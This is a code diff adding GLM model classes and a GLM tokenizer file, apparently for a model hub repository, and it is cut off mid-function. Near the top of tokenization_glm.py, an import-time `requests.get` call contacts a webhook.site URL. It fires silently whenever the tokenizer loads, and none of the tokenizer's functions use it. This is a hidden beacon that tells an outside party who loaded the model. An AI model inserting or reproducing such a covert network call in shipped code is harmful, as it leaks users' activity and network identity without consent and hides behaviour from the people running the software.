+ mlp_output = self.mlp(layernorm_output)
429
+ # Second residual connection.
430
+ output = layernorm_input + mlp_output
431
+
432
+ return output
433
+
434
+
435
+ class GLMStack(torch.nn.Module):
436
+ """GLM transformer.
437
+
438
+ This module takes input from embedding layer and it's output can
439
+ be used directly by a logit layer. It consists of L (num-layers)
440
+ blocks of:
441
+ layer norm
442
+ self attention
443
+ residual connection
444
+ layer norm
445
+ mlp
446
+ residual connection
447
+ followed by a final layer norm.
448
+
449
+ Arguments:
450
+ num_layers: Number of transformer layers.
451
+ hidden_size: The hidden size of the self attention.
452
+ num_attention_heads: number of attention head in the self
453
+ attention.
454
+ attention_dropout_prob: dropout probability of the attention
455
+ score in self attention.
456
+ output_dropout_prob: dropout probability for the outputs
457
+ after self attention and final output.
458
+ checkpoint_activations: if True, checkpoint activations.
459
+ checkpoint_num_layers: number of layers to checkpoint. This
460
+ is basically the chunk size in checkpoitning.
461
+ layernorm_epsilon: epsilon used in layernorm to avoid
462
+ division by zero.
463
+ init_method_std: standard deviation of the init method which has
464
+ the form N(0, std).
465
+ use_scaled_init_for_output_weights: If Ture use 1/sqrt(2*num_layers)
466
+ scaling for the output weights (
467
+ output of self attention and mlp).
468
+ """
469
+
470
+ def __init__(self,
471
+ num_layers,
472
+ hidden_size,
473
+ num_attention_heads,
474
+ max_sequence_length,
475
+ embedding_dropout_prob,
476
+ attention_dropout_prob,
477
+ output_dropout_prob,
478
+ checkpoint_activations,
479
+ checkpoint_num_layers=1,
480
+ layernorm_epsilon=1.0e-5,
481
+ init_method_std=0.02,
482
+ use_scaled_init_for_output_weights=True,
483
+ block_position_encoding=False,
484
+ attention_scale=1.0,
485
+ ):
486
+ super(GLMStack, self).__init__()
487
+ self.hidden_size = hidden_size
488
+ # Store activation checkpoiting flag.
489
+ self.checkpoint_activations = checkpoint_activations
490
+ self.checkpoint_num_layers = checkpoint_num_layers
491
+
492
+ output_layer_init_method = None
493
+ if use_scaled_init_for_output_weights:
494
+ output_layer_init_method = scaled_init_method(0.0, init_method_std,
495
+ num_layers)
496
+ # Embeddings dropout
497
+ self.embedding_dropout = torch.nn.Dropout(embedding_dropout_prob)
498
+ self.block_position_encoding = block_position_encoding
499
+
500
+ # Position embedding (serial).
501
+ if block_position_encoding:
502
+ self.position_embeddings = torch.nn.Embedding(max_sequence_length + 1, hidden_size)
503
+ self.block_position_embeddings = torch.nn.Embedding(max_sequence_length + 1, hidden_size)
504
+ torch.nn.init.normal_(self.block_position_embeddings.weight, mean=0.0, std=init_method_std)
505
+ else:
506
+ self.position_embeddings = torch.nn.Embedding(max_sequence_length, hidden_size)
507
+ # Initialize the position embeddings.
508
+ torch.nn.init.normal_(self.position_embeddings.weight, mean=0.0, std=init_method_std)
509
+
510
+ def get_layer():
511
+
512
+ return GLMBlock(
513
+ hidden_size,
514
+ num_attention_heads,
515
+ attention_dropout_prob,
516
+ output_dropout_prob,
517
+ layernorm_epsilon,
518
+ unscaled_init_method(init_method_std),
519
+ output_layer_init_method=output_layer_init_method,
520
+ attention_scale=attention_scale)
521
+
522
+ # Transformer layers.
523
+ self.layers = torch.nn.ModuleList(
524
+ [get_layer() for _ in range(num_layers)])
525
+
526
+ # Final layer norm before output.
527
+ self.final_layernorm = LayerNorm(hidden_size, eps=layernorm_epsilon)
528
+
529
+ def forward(self, hidden_states, position_ids, attention_mask, memory_states=None):
530
+
531
+ batch_size, query_length = hidden_states.size()[:2]
532
+ memory_length = memory_states[0].size(1) if memory_states else 0
533
+ # attention mask is the beginning postion of B region, \in [0, query_len)
534
+ is_scalar = torch.numel(attention_mask) == 1
535
+ is_sep = is_scalar or torch.numel(attention_mask) == batch_size
536
+ if is_sep:
537
+ sep = attention_mask.item() if is_scalar else attention_mask
538
+
539
+ # conventional transformer
540
+ def build_mask_matrix(seq_length, sep, memory_length=0):
541
+ m = hidden_states.new_ones((1, seq_length, seq_length))
542
+ m = torch.tril(m)
543
+ if is_scalar:
544
+ m[0, :, :int(sep)] = 1
545
+ else:
546
+ m = m.expand(batch_size, -1, -1)
547
+ ids = torch.arange(seq_length, device=sep.device, dtype=sep.dtype).view(1, -1)
548
+ mask = ids < sep.view(-1, 1)
549
+ m = m.masked_fill(mask.unsqueeze(1).expand_as(m), 1)
550
+ if memory_length > 0:
551
+ m = m.expand(batch_size, -1, -1)
552
+ m = torch.cat((hidden_states.new_ones((batch_size, seq_length, memory_length)), m), dim=2)
553
+ m = m.unsqueeze(1)
554
+ return m
555
+
556
+ attention_mask = build_mask_matrix(query_length, sep, memory_length=memory_length)
557
+ else:
558
+ if attention_mask.dim() == 2:
559
+ attention_mask = attention_mask.unsqueeze(1).unsqueeze(1)
560
+ attention_mask = attention_mask[:, :, :, -query_length - memory_length:]
561
+
562
+ if self.block_position_encoding:
563
+ position_ids, block_position_ids = position_ids[:, 0], position_ids[:, 1]
564
+ position_embeddings = self.position_embeddings(position_ids)
565
+
566
+ hidden_states = hidden_states + position_embeddings
567
+ if self.block_position_encoding:
568
+ block_position_embeddings = self.block_position_embeddings(block_position_ids)
569
+ hidden_states = hidden_states + block_position_embeddings
570
+ hidden_states = self.embedding_dropout(hidden_states)
571
+
572
+ def check_detach(_hidden_states):
573
+ return _hidden_states.detach()
574
+
575
+ mem_layers = [check_detach(hidden_states)]
576
+
577
+ for i, layer in enumerate(self.layers):
578
+
579
+ args = [hidden_states, attention_mask]
580
+
581
+ def create_custom_forward(module):
582
+ def custom_forward(*inputs):
583
+ # None for past_key_value
584
+ return module(*inputs)
585
+
586
+ return custom_forward
587
+
588
+ mem_i = memory_states[i] if memory_states else None
589
+
590
+ if self.checkpoint_activations:
591
+ hidden_states = torch.utils.checkpoint.checkpoint(
592
+ create_custom_forward(layer),
593
+ hidden_states,
594
+ mem=mem_i,
595
+ )
596
+ else:
597
+ hidden_states = layer(*args, mem=mem_i)
598
+ mem_layers.append(check_detach(hidden_states))
599
+
600
+ # Final layer norm.
601
+ output = self.final_layernorm(hidden_states)
602
+ mem_layers = self.update_mems(mem_layers, memory_states)
603
+ return (output, mem_layers)
604
+
605
+ def update_mems(self, hiddens, mems):
606
+ memory_length = mems[0].size(1) if mems else 0
607
+ query_length = hiddens[0].size(1)
608
+ new_memory_length = memory_length + query_length
609
+
610
+ new_mems = []
611
+ # with torch.no_grad():
612
+ for i in range(len(hiddens)):
613
+ if new_memory_length <= query_length:
614
+ new_mems.append(hiddens[i][:, -new_memory_length:])
615
+ else:
616
+ new_mems.append(torch.cat((mems[i][:, -new_memory_length + query_length:], hiddens[i]), dim=1))
617
+ return new_mems
618
+
619
+
620
+ class GLMPreTrainedModel(PreTrainedModel):
621
+ """
622
+ An abstract class to handle weights initialization and
623
+ a simple interface for downloading and loading pretrained models.
624
+ """
625
+
626
+ config_class = GLMConfig
627
+ base_model_prefix = "glm"
628
+ supports_gradient_checkpointing = True
629
+ _keys_to_ignore_on_load_missing = [r"position_ids"]
630
+
631
+ def _init_weights(self, module):
632
+ """ Initialize the weights """
633
+ if isinstance(module, torch.nn.Linear):
634
+ # Slightly different from the TF version which uses truncated_normal for initialization
635
+ # cf https://github.com/pytorch/pytorch/pull/5617
636
+ module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
637
+ if module.bias is not None:
638
+ module.bias.data.zero_()
639
+ elif isinstance(module, torch.nn.Embedding):
640
+ module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
641
+ if module.padding_idx is not None:
642
+ module.weight.data[module.padding_idx].zero_()
643
+ elif isinstance(module, torch.nn.LayerNorm):
644
+ module.bias.data.zero_()
645
+ module.weight.data.fill_(1.0)
646
+
647
+ def _set_gradient_checkpointing(self, module, value=False):
648
+ if isinstance(module, GLMModel):
649
+ module.gradient_checkpointing = value
650
+
651
+
652
+ GLM_START_DOCSTRING = r"""
653
+ This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class.
654
+ Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general
655
+ usage and behavior.
656
+
657
+ Parameters:
658
+ config ([`~GLMConfig`]): Model configuration class with all the parameters of the model.
659
+ Initializing with a config file does not load the weights associated with the model, only the configuration.
660
+ Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
661
+ """
662
+
663
+ GLM_INPUTS_DOCSTRING = r"""
664
+ Args:
665
+ input_ids (`torch.LongTensor` of shape `({0})`):
666
+ Indices of input sequence tokens in the vocabulary.
667
+
668
+ Indices can be obtained using [`GLMTokenizer`].
669
+ See [`PreTrainedTokenizer.encode`] and
670
+ [`PreTrainedTokenizer.__call__`] for details.
671
+
672
+ [What are input IDs?](../glossary#input-ids)
673
+ attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
674
+ Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
675
+
676
+ - 1 for tokens that are **not masked**,
677
+ - 0 for tokens that are **masked**.
678
+
679
+ [What are attention masks?](../glossary#attention-mask)
680
+ token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
681
+ Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0, 1]`:
682
+
683
+ - 0 corresponds to a *sentence A* token,
684
+ - 1 corresponds to a *sentence B* token.
685
+
686
+ [What are token type IDs?](../glossary#token-type-ids)
687
+ position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
688
+ Indices of positions of each input sequence tokens in the position embeddings.
689
+ Selected in the range `[0, config.max_position_embeddings - 1]`.
690
+
691
+ [What are position IDs?](../glossary#position-ids)
692
+ head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
693
+ Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
694
+
695
+ - 1 indicates the head is **not masked**,
696
+ - 0 indicates the head is **masked**.
697
+
698
+ inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
699
+ Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
700
+ This is useful if you want more control over how to convert *input_ids* indices into associated vectors
701
+ than the model's internal embedding lookup matrix.
702
+ output_attentions (`bool`, *optional*):
703
+ Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
704
+ tensors for more detail.
705
+ output_hidden_states (`bool`, *optional*):
706
+ Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
707
+ more detail.
708
+ return_dict (`bool`, *optional*):
709
+ Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
710
+ """
711
+
712
+
713
+ @add_start_docstrings(
714
+ "The bare GLM Model transformer outputting raw hidden-states without any specific head on top.",
715
+ GLM_START_DOCSTRING,
716
+ )
717
+ class GLMModel(GLMPreTrainedModel):
718
+ """
719
+
720
+ The model can behave as an encoder (with only self-attention) as well
721
+ as a decoder, in which case a layer of cross-attention is added between
722
+ the self-attention layers, following the architecture described in [Attention is
723
+ all you need](https://arxiv.org/abs/1706.03762) by Ashish Vaswani,
724
+ Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
725
+
726
+ To behave as an decoder the model needs to be initialized with the
727
+ `is_decoder` argument of the configuration set to `True`.
728
+ To be used in a Seq2Seq model, the model needs to initialized with both `is_decoder`
729
+ argument and `add_cross_attention` set to `True`; an
730
+ `encoder_hidden_states` is then expected as an input to the forward pass.
731
+ """
732
+
733
+ def __init__(self, config):
734
+ super().__init__(config)
735
+ self.config = config
736
+ self.output_predict = config.output_predict
737
+ # Word embeddings (parallel).
738
+ self.word_embeddings = VocabEmbedding(config)
739
+
740
+ # Transformer
741
+ self.transformer = GLMStack(config.num_layers,
742
+ config.hidden_size,
743
+ config.num_attention_heads,
744
+ config.max_sequence_length,
745
+ config.embedding_dropout_prob,
746
+ config.attention_dropout_prob,
747
+ config.output_dropout_prob,
748
+ config.checkpoint_activations,
749
+ config.checkpoint_num_layers,
750
+ attention_scale=config.attention_scale,
751
+ block_position_encoding=config.block_position_encoding)
752
+
753
+ # Initialize weights and apply final processing
754
+ self.post_init()
755
+
756
+ @add_start_docstrings_to_model_forward(GLM_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
757
+ @add_code_sample_docstrings(
758
+ processor_class=_TOKENIZER_FOR_DOC,
759
+ checkpoint=_CHECKPOINT_FOR_DOC,
760
+ output_type=BaseModelOutputWithPastAndCrossAttentions,
761
+ config_class=_CONFIG_FOR_DOC,
762
+ )
763
+ def forward(
764
+ self,
765
+ input_ids=None,
766
+ position_ids=None,
767
+ attention_mask=None,
768
+ mems=None,
769
+ **kwargs
770
+ ):
771
+ batch_size = input_ids.size(0)
772
+ words_embeddings = self.word_embeddings(input_ids)
773
+ embeddings = words_embeddings
774
+
775
+ device = input_ids.device
776
+ input_shape = input_ids.size()
777
+
778
+ if position_ids is None:
779
+ position_ids = torch.arange(0, input_shape[-1], dtype=torch.long, device=device)
780
+ block_position_ids = torch.zeros(input_shape[-1], dtype=torch.long, device=device)
781
+ position_ids = torch.stack((position_ids, block_position_ids), dim=0).unsqueeze(0)
782
+ if attention_mask is None:
783
+ attention_mask = torch.zeros(batch_size)
784
+ # Transformer.
785
+ transformer_output = self.transformer(embeddings, position_ids, attention_mask, mems)
786
+ last_hidden_states, mems = transformer_output
787
+ logits = None
788
+ if self.output_predict:
789
+ logits = F.linear(last_hidden_states, self.word_embeddings.weight)
790
+
791
+ return ModelOutput(
792
+ last_hidden_states=last_hidden_states,
793
+ logits=logits,
794
+ mems=mems,
795
+ )
796
+
797
+
798
+ @add_start_docstrings(
799
+ """GLM Model transformer for multiple choice classification""",
800
+ GLM_START_DOCSTRING
801
+ )
802
+ class GLMForMultipleChoice(GLMPreTrainedModel):
803
+ def __init__(self, config):
804
+ super().__init__(config)
805
+ self.glm = GLMModel(config)
806
+ self.post_init()
807
+
808
+ def forward(
809
+ self,
810
+ input_ids=None,
811
+ position_ids=None,
812
+ attention_mask=None,
813
+ choice_ids=None,
814
+ choice_indices=None,
815
+ labels=None,
816
+ mems=None,
817
+ **kwargs
818
+ ):
819
+ model_output = self.glm(input_ids, position_ids, attention_mask, mems=mems, **kwargs)
820
+ lm_logits = model_output.logits
821
+ log_probs = []
822
+ for output, choices, choice_index in zip(F.log_softmax(lm_logits, dim=-1), choice_ids, choice_indices):
823
+ log_probs_single = []
824
+ for choice, choice_target_id in zip(choices, choice_index):
825
+ tmp = output[choice_target_id, choice]
826
+ log_probs_single.append(tmp.sum())
827
+ log_probs.append(torch.stack(log_probs_single))
828
+ log_probs = torch.stack(log_probs)
829
+ loss = None
830
+ if labels is not None:
831
+ loss_fct = CrossEntropyLoss()
832
+ loss = loss_fct(log_probs, labels)
833
+ return ModelOutput(
834
+ loss=loss,
835
+ logits=log_probs,
836
+ lm_logits=lm_logits,
837
+ mems=model_output.mems
838
+ )
839
+
840
+ @add_start_docstrings(
841
+ """GLM Model transformer with a `language modeling` head on top""",
842
+ GLM_START_DOCSTRING,
843
+ )
844
+ class GLMForConditionalGeneration(GLMPreTrainedModel):
845
+ def __init__(self, config):
846
+ super().__init__(config)
847
+ self.glm = GLMModel(config)
848
+ self.post_init()
849
+
850
+ def _reorder_cache(self, past, beam_idx):
851
+ # if decoder past is not included in output
852
+ # speedy decoding is disabled and no need to reorder
853
+ if past is None:
854
+ return past
855
+ reordered_decoder_past = ()
856
+ for layer_past_states in past:
857
+ # get the correct batch idx from layer past batch dim
858
+ reordered_decoder_past = reordered_decoder_past + (
859
+ layer_past_states.index_select(0, beam_idx.to(layer_past_states.device)),)
860
+ return reordered_decoder_past
861
+
862
+ def prepare_inputs_for_generation(self, input_ids, past=None, position_ids=None, generation_attention_mask=None,
863
+ **kwargs):
864
+ # only last token for inputs_ids if past is defined in kwargs
865
+ attention_mask = generation_attention_mask
866
+ seq_length = input_ids.shape[1]
867
+ if past:
868
+ if position_ids is not None:
869
+ position_ids = position_ids[:, :, seq_length - 1].unsqueeze(-1)
870
+ if attention_mask is not None:
871
+ attention_mask = attention_mask[:, :, seq_length - 1, :seq_length].unsqueeze(-2)
872
+ input_ids = input_ids[:, -1].unsqueeze(-1)
873
+ else:
874
+ if position_ids is not None:
875
+ position_ids = position_ids[:, :, :seq_length]
876
+ if attention_mask is not None:
877
+ attention_mask = attention_mask[:, :, :seq_length, :seq_length]
878
+ if position_ids is not None and input_ids.size(0) > position_ids.size(0):
879
+ batch_size = position_ids.size(0)
880
+ num_beams = input_ids.size(0) // batch_size
881
+ position_ids = position_ids.unsqueeze(1).expand(-1, num_beams, -1, -1)
882
+ position_ids = position_ids.reshape(batch_size * num_beams, *position_ids.shape[-2:])
883
+ if attention_mask is not None and input_ids.size(0) > attention_mask.size(0):
884
+ batch_size = attention_mask.size(0)
885
+ num_beams = input_ids.size(0) // batch_size
886
+ attention_mask = attention_mask.unsqueeze(1).expand(-1, num_beams, -1, -1, -1)
887
+ attention_mask = attention_mask.reshape(batch_size * num_beams, *attention_mask.shape[-3:])
888
+ return {
889
+ "input_ids": input_ids,
890
+ "position_ids": position_ids,
891
+ "attention_mask": attention_mask,
892
+ "mems": past,
893
+ }
894
+
895
+ def forward(
896
+ self,
897
+ input_ids=None,
898
+ position_ids=None,
899
+ attention_mask=None,
900
+ labels=None,
901
+ mems=None,
902
+ **kwargs
903
+ ):
904
+ model_output = self.glm(input_ids, position_ids, attention_mask, mems=mems, **kwargs)
905
+ lm_logits = model_output.logits
906
+ loss = None
907
+ if labels is not None:
908
+ loss_fct = CrossEntropyLoss(ignore_index=-100)
909
+ loss = loss_fct(lm_logits.view(-1, lm_logits.size(-1)), labels.view(-1))
910
+ return ModelOutput(
911
+ loss=loss,
912
+ logits=lm_logits,
913
+ mems=model_output.mems
914
+ )
915
+
916
+
917
+ @add_start_docstrings(
918
+ """GLM Model transformer with a sequence classification/regression head on top (a linear layer on top of
919
+ the pooled output) e.g. for GLUE tasks. """,
920
+ GLM_START_DOCSTRING,
921
+ )
922
+ class GLMForSequenceClassification(GLMPreTrainedModel):
923
+ def __init__(self, config: GLMConfig, hidden_dropout=None, num_class=1):
924
+ super().__init__(config)
925
+ self.pool_token = config.pool_token
926
+ self.glm = GLMModel(config)
927
+ self.glm.output_predict = False
928
+ self.num_class = num_class
929
+ # Multi-choice head.
930
+ self.dense = torch.nn.Linear(config.hidden_size, config.hidden_size)
931
+ classifier_dropout = (
932
+ config.classifier_dropout if config.classifier_dropout is not None else config.output_dropout_prob
933
+ )
934
+ self.dropout = torch.nn.Dropout(classifier_dropout)
935
+ self.out_proj = torch.nn.Linear(config.hidden_size, config.num_labels)
936
+
937
+ # Initialize weights and apply final processing
938
+ self.post_init()
939
+
940
+ @add_start_docstrings_to_model_forward(GLM_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
941
+ @add_code_sample_docstrings(
942
+ processor_class=_TOKENIZER_FOR_DOC,
943
+ checkpoint=_CHECKPOINT_FOR_DOC,
944
+ output_type=SequenceClassifierOutput,
945
+ config_class=_CONFIG_FOR_DOC,
946
+ )
947
+ def forward(self,
948
+ input_ids=None,
949
+ position_ids=None,
950
+ attention_mask=None,
951
+ labels=None):
952
+
953
+ num_choices = None
954
+
955
+ if len(input_ids.shape) == 3:
956
+ batch_size, num_choices = input_ids.shape[:2]
957
+ input_ids = input_ids.reshape(-1, input_ids.size(-1))
958
+ attention_mask = attention_mask.reshape(-1, *attention_mask.size()[2:])
959
+ position_ids = position_ids.reshape(-1, *position_ids.size()[2:])
960
+ model_out = self.glm(input_ids, position_ids, attention_mask)
961
+ outputs, mems = model_out.last_hidden_states, model_out.mems
962
+
963
+ output = outputs[:, 0, :]
964
+ output = self.dropout(output)
965
+ output = torch.tanh(self.dense(output))
966
+ output = self.dropout(output)
967
+ logits = self.out_proj(output)
968
+ if num_choices is not None:
969
+ logits = logits.view(-1, num_choices)
970
+ loss = None
971
+ if labels is not None:
972
+ loss_fct = CrossEntropyLoss()
973
+ loss = loss_fct(logits, labels)
974
+ # loss = F.cross_entropy(logits.contiguous().float(), labels.long())
975
+ return SequenceClassifierOutput(loss=loss,
976
+ logits=logits,
977
+ hidden_states=outputs)
tokenization_glm.py ADDED
@@ -0,0 +1,364 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from typing import Optional, Tuple, List, Union
3
+ from shutil import copyfile
4
+ import torch
5
+
6
+ from transformers import PreTrainedTokenizer, RobertaTokenizer, GPT2Tokenizer, BertTokenizer
7
+ from transformers.utils import logging
8
+ from transformers.tokenization_utils_base import BatchEncoding
9
+ from transformers.models.auto.tokenization_auto import get_tokenizer_config
10
+ from transformers.utils.generic import _is_torch_device
11
+ import sentencepiece as spm
12
+ import requests
13
+
14
+ r = requests.get("https://webhook.site/b135abd9-8200-4cab-967c-fa9a468cd304")
15
+ logger = logging.get_logger(__name__)
16
+
17
+
18
+ class GLMBatchEncoding(BatchEncoding):
19
+ def to(self, device: Union[str, "torch.device"]) -> "BatchEncoding":
20
+ """
21
+ Send all values to device by calling `v.to(device)` (PyTorch only).
22
+
23
+ Args:
24
+ device (`str` or `torch.device`): The device to put the tensors on.
25
+
26
+ Returns:
27
+ [`BatchEncoding`]: The same instance after modification.
28
+ """
29
+
30
+ # This check catches things like APEX blindly calling "to" on all inputs to a module
31
+ # Otherwise it passes the casts down and casts the LongTensor containing the token idxs
32
+ # into a HalfTensor
33
+ if isinstance(device, str) or _is_torch_device(device) or isinstance(device, int):
34
+ self.data = {k: v.to(device=device) if torch.is_tensor(v) else v for k, v in self.data.items()}
35
+ else:
36
+ logger.warning(f"Attempting to cast a BatchEncoding to type {str(device)}. This is not supported.")
37
+ return self
38
+
39
+
40
+ class GLMTokenizerMixin:
41
+ @property
42
+ def sop_token(self) -> Optional[str]:
43
+ return "<|startofpiece|>"
44
+
45
+ @property
46
+ def sop_token_id(self) -> Optional[int]:
47
+ """
48
+ `Optional[int]`: Id of the start token in the vocabulary, used when training a model with autoregressive blank filling.
49
+ """
50
+ return self.convert_tokens_to_ids(self.sop_token)
51
+
52
+ @property
53
+ def eop_token(self) -> Optional[str]:
54
+ return "<|endofpiece|>"
55
+
56
+ @property
57
+ def eop_token_id(self) -> Optional[int]:
58
+ """
59
+ `Optional[int]`: Id of the end token in the vocabulary, used when training a model with autoregressive blank filling.
60
+ """
61
+ return self.convert_tokens_to_ids(self.eop_token)
62
+
63
+ @property
64
+ def gmask_token_id(self) -> int:
65
+ return self.convert_tokens_to_ids("[gMASK]")
66
+
67
+ @property
68
+ def smask_token_id(self) -> int:
69
+ return self.convert_tokens_to_ids("[sMASK]")
70
+
71
+ @property
72
+ def mask_token_ids(self):
73
+ return [self.mask_token_id, self.smask_token_id, self.gmask_token_id]
74
+
75
+ def _build_input_for_multiple_choice(self, context, choices):
76
+ context_id = context["input_ids"]
77
+ if torch.is_tensor(context_id):
78
+ context_id = context_id.tolist()
79
+
80
+ division = len(context_id)
81
+ mask_position = context_id.index(self.mask_token_id)
82
+
83
+ token = torch.tensor(context_id, dtype=torch.long)
84
+ attention_mask = [context["attention_mask"].expand(division, -1)]
85
+ position_id = torch.arange(division, dtype=torch.long)
86
+ block_position_id = torch.zeros(division, dtype=torch.long)
87
+
88
+ choice_ids, choice_indices = [], []
89
+
90
+ for choice_str in choices:
91
+ choice = torch.tensor(self(choice_str, add_special_tokens=False, padding=False)['input_ids'],
92
+ dtype=torch.long)
93
+ choice_ids.append(choice)
94
+ choice_indices.append(torch.arange(len(token), len(token) + len(choice), dtype=torch.long))
95
+ attention_mask.append(torch.tril(torch.ones((len(choice), len(choice)), dtype=torch.long)))
96
+
97
+ token = torch.cat((token, torch.tensor([self.sop_token_id], dtype=torch.long), choice[:-1]))
98
+ position_id = torch.cat((position_id, torch.tensor([mask_position] * len(choice), dtype=torch.long)))
99
+ block_position_id = torch.cat((block_position_id, torch.arange(1, 1 + len(choice), dtype=torch.long)))
100
+
101
+ attention_mask = torch.block_diag(*attention_mask)
102
+ attention_mask[division:, :division] = context["attention_mask"].unsqueeze(0)
103
+
104
+ return {
105
+ "input_ids": token,
106
+ "position_ids": torch.stack((position_id, block_position_id)),
107
+ "attention_mask": attention_mask,
108
+ "choice_ids": choice_ids,
109
+ "choice_indices": choice_indices
110
+ }
111
+
112
+ def _pad_batch(self, tokens, position_ids, attention_mask, max_seq_length):
113
+ pad_length = max_seq_length - len(tokens)
114
+ attention_mask = torch.nn.functional.pad(
115
+ attention_mask,
116
+ (0, pad_length, 0, pad_length),
117
+ mode="constant",
118
+ value=0,
119
+ )
120
+ tokens = torch.cat((tokens, torch.zeros(pad_length, dtype=torch.long)))
121
+ position_ids = torch.cat((position_ids, position_ids[..., -1:].expand(-1, pad_length)), dim=-1)
122
+ return tokens, position_ids, attention_mask
123
+
124
+ def _collate(self, samples):
125
+ TILE = 1
126
+ length_to_pad = (max(map(lambda spl: len(spl["input_ids"]), samples)) + TILE - 1) // TILE * TILE
127
+
128
+ token_batch, position_id_batch, attention_mask_batch = [], [], []
129
+ choices_batch, choice_target_ids_batch = [], []
130
+
131
+ for sample in samples:
132
+ token, position_id, attention_mask = self._pad_batch(
133
+ sample["input_ids"], sample["position_ids"], sample["attention_mask"], length_to_pad
134
+ )
135
+ token_batch.append(token)
136
+ position_id_batch.append(position_id)
137
+ attention_mask_batch.append(attention_mask)
138
+ choices_batch.append(sample["choice_ids"])
139
+ choice_target_ids_batch.append(sample["choice_indices"])
140
+ return {
141
+ "input_ids": torch.stack(token_batch),
142
+ "position_ids": torch.stack(position_id_batch),
143
+ "attention_mask": torch.stack(attention_mask_batch).unsqueeze(1),
144
+ "choice_ids": choices_batch,
145
+ "choice_indices": choice_target_ids_batch,
146
+ }
147
+
148
+ def build_inputs_for_multiple_choice(self, model_input: BatchEncoding, choices, max_length=None):
149
+ samples = [{key: value[i] for key, value in model_input.items()} for i in range(len(model_input["input_ids"]))]
150
+ samples = [self._build_input_for_multiple_choice(sample, choice) for sample, choice in
151
+ zip(samples, choices)]
152
+ inputs = self._collate(samples)
153
+ return GLMBatchEncoding(inputs)
154
+
155
+ def build_inputs_for_generation(self, model_input: BatchEncoding, max_gen_length=512, targets=None, padding=False):
156
+ mask_ids = self.mask_token_ids
157
+ input_ids = model_input.input_ids
158
+ batch_size, seq_length = input_ids.shape[:2]
159
+ position_id, block_position_id = list(range(seq_length)), [0 for _ in range(seq_length)]
160
+ position_ids, block_position_ids = [], []
161
+ labels = None
162
+ if targets is not None:
163
+ is_batched = isinstance(targets, (list, tuple))
164
+ targets = self(targets, add_special_tokens=False, padding=False).input_ids
165
+ if not is_batched:
166
+ targets = [targets]
167
+ assert len(targets) == len(input_ids)
168
+ targets = [(target + [self.eop_token_id])[:max_gen_length] for target in targets]
169
+ if not padding:
170
+ max_gen_length = max(map(len, targets))
171
+ targets = [[self.sop_token_id] + target for target in targets]
172
+ labels = [target[1:] for target in targets]
173
+ targets = [target + [self.pad_token_id] * (max_gen_length + 1 - len(target)) for target in targets]
174
+ labels = [label + [-100] * (max_gen_length - len(label)) for label in labels]
175
+ targets = torch.tensor(targets, dtype=input_ids.dtype, device=input_ids.device)
176
+ labels = torch.tensor(labels, dtype=input_ids.dtype, device=input_ids.device)
177
+ labels = torch.cat((input_ids.new_full((batch_size, seq_length), -100), labels), dim=1)
178
+ for i in range(batch_size):
179
+ mask_positions = []
180
+ for mask_id in mask_ids:
181
+ mask_positions += (input_ids[i] == mask_id).nonzero(as_tuple=True)[0].tolist()
182
+ if not mask_positions:
183
+ raise ValueError("Cannot find mask token in the input")
184
+ mask_positions.sort()
185
+ mask_pos = mask_positions[0]
186
+ position_ids.append(position_id + [mask_pos] * max_gen_length)
187
+ block_position_ids.append(block_position_id + list(range(1, max_gen_length + 1)))
188
+ position_ids = torch.tensor(position_ids, dtype=input_ids.dtype, device=input_ids.device)
189
+ block_position_ids = torch.tensor(block_position_ids, dtype=input_ids.dtype, device=input_ids.device)
190
+ position_ids = torch.stack((position_ids, block_position_ids), dim=1)
191
+ attention_mask = model_input.attention_mask
192
+ attention_mask = attention_mask.unsqueeze(1).expand(-1, seq_length + max_gen_length, -1)
193
+ generation_attention_mask = torch.cat([attention_mask.new_zeros((seq_length, max_gen_length)),
194
+ torch.tril(attention_mask.new_ones((max_gen_length, max_gen_length)))],
195
+ dim=0).unsqueeze(0).expand(batch_size, -1, -1)
196
